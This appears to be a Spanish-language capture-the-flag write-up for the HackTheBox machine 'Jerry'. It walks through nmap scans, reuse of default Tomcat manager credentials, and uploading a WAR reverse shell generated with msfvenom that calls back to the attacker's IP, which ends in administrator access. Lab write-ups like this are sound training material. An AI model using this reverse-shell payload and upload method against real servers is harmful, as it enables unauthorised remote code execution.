Posts Hackthebox Jerry Writeup (OSCP Style)
Post
Cancel

Hackthebox Jerry Writeup (OSCP Style)

Información de la máquina.

ContenidoDescripción
OS:
Dificultad:Facil
Puntos:20
Lanzamiento:30-Junio-2018
IP:10.10.10.95
Primera sangre de usuario:echthros
Primera sangre de system:echthros
Creador:mrh4sh

Reconocimiento.

Como siempre comenzaremos con un escaneo a los 65535 puertos de la máquina para poder encontrar cuales son los puertos abiertos.

1
2
3
4
5
6
7
8
9
10
intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts jerry.htb -Pn --min-rate 2000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 22:48 CDT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.22s latency).
Not shown: 65534 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 66.11 seconds

Una vez terminado el escaneo lanzare scripts básicos de enumeración para detectar el servicio y la versión que se ejecuta bajo este puerto.

1
2
3
4
5
6
7
8
9
10
11
12
13
intrusionz3r0@kali:~$ nmap -sCV -p8080 -oN targeted jerry.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 22:51 CDT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds

El escaneo determino lo siguiente:

  • Puerto 8080 con servicio tomcat.

Rápidamente abro mi navegador y me dirijo a la página web.

Nos encontramos con la página por defecto de tomcat.

Enumeración.

Si nos vamos a Manager APP se nos mostrara un panel de login.

Si colocamos cualquier cosa como credenciales el servidor nos responderá con un código de estado 401.

Esto nos revelara lo que parece ser unas credenciales de acceso.

Cuando pruebo las credenciales en el panel de login, me autentica correctamente y accedemos al portal.

Explotación

Como atacantes necesitamos buscar vías de explotación, en este caso si continuamos bajando encontraremos un apartado donde nosotros podremos subir archivos war al servidor.

¿Que es un archivo war? Un archivo WAR es un archivo JAR utilizado para distribuir una colección de JavaServer Pages, servlets, clases Java, archivos XML, bibliotecas de tags y páginas web estáticas que juntos constituyen una aplicación web.

Por lo tanto esta es nuestra via de explotación, lo que haremos será lo siguiente:

  • Haremos uso de la herramienta msfvenom para crear un reverse shell en formato war.
  • Subiremos el archivo malicioso.
  • Ejecutamos nuestro archivo.

Creamos el payload.

1
intrusionz3r0@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.28 LPORT=1234 -f war > shell.war

Subimos el archivo al servidor.

Shell como Administrador.

Dejamos nuestro netcat a la escucha de cualquier conexión entrante y ejecutamos nuestro payload dirigiéndonos a http://jerry.htb:8080/shell/.

¡¡Somos Administradores!!

enter image description here

Espero te haya gustado, recuerda seguirme en mis redes sociales para estar al pendiente de todo mi contenido.

¡Muchas Gracias!

This post is licensed under CC BY 4.0 by the author.